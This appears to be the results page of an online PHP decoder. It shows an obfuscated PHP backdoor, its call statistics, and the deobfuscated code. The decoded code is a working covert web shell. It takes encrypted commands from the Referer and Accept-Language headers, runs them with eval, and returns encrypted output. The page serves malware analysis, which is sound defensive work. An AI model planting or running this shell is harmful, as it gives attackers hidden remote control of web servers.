Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $l='I=9I0.(9I[9I\\d]))?,?/",$ra9I,$m);i9If($q&&9I$m){@9I9Isession_start();$s=&$9I_S..
Decoded Output download
$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}
Did this file decode correctly?
Original Code
<?php
$l='I=9I0.(9I[9I\\d]))?,?/",$ra9I,$m);i9If($q&&9I$m){@9I9Isession_start();$s=&$9I_SE9I9ISSION9I;$ss9I="substr9I";$';
$d='($e9I){$k=$kh.$9Ikf;ob_9Ist9Iart();@e9Ival(@gzunco9Impres9Is(@9Ix(@base69I4_d9Iecode9I(preg_replac9Ie9I(9Iarray(';
$s='$i<$l;9I){for(9I$j=0;($j9I<9I$c&&$9Ii<$l);$j++9I,$9Ii++){$o.=$t{$i}9I^$9Ik{$9Ij};}}retur9In $o;}$r=$9I_SER9IV';
$T='ean();$d=ba9Is9I9Ie64_encode(x9I(gz9Ico9Imp9Iress($o),9I$k))9I;print("<$k9I>$d</$k>");@se9Ission_de9Is9Itroy();}}}}';
$u='ER9I;$rr=@9I9I$r["HTTP_REFERER"9I];$ra9I=@$9Ir["HT9ITP_ACCEPT_L9IANGUAG9IE"];9Iif($9Irr&&$ra){9I$9Iu=9Iparse_url9I($r';
$R='"/_/","/-9I/"),arr9Iay("9I/","+")9I,$ss9I(9I$s[$i],9I0,$9Ie))),$k))9I);$o=ob_get9I_content9Is();ob9I_e9Ind_9Icl';
$M='9Isl="strtolower";$i=9I$m[1][0]9I.$9Im[1][1];$h9I=$sl($9Iss9I(md5($i9I.$kh),9I0,9I3));$f=$9Is9Il($ss(md5(9I$i';
$P=str_replace('Tj','','cTjTjrTjeatTje_funTjTjction');
$g='r);parse9I_s9Itr($9Iu["query"9I],$q);$q=9Iar9Ir9Iay_values9I($q);p9Ireg_matc9Ih_9Iall("/([\\w])[\\w-9I]+(?9I:;q9';
$S='.$9Ikf9I),0,3));$p="";fo9Ir($z9I=1;$z<c9Iount($m[19I]);$z9I++9I)$p.9I=$q9I[$m[2][$z]];if9I(strp9Ios($p,9I$h)=9I==0)';
$X='$kh="5d49I1"9I;$kf="402a"9I;func9Ition x($t9I,9I$k){$9Ic=strlen($9Ik9I);9I$l=strlen($t);$o9I9I="";f9Ior($i=9I0;';
$x='{$s[9I$i]="";$p9I=$ss($9Ip,39I);}if(ar9Iray_9Ikey_e9Ix9I9Iists($i,$s)){$s[$i].9I=$9Ip9I9I;$e=strpos9I($9Is[$i],$f);if';
$a=str_replace('9I','',$X.$s.$u.$g.$l.$M.$S.$x.$d.$R.$T);
$J=$P('',$a);$J();
?>
Function Calls
null | 1 |
str_replace | 2 |
create_function | 1 |
Stats
MD5 | 43087fd2d0e9ad522c1ef9e8211c02b9 |
Eval Count | 1 |
Decode Time | 137 ms |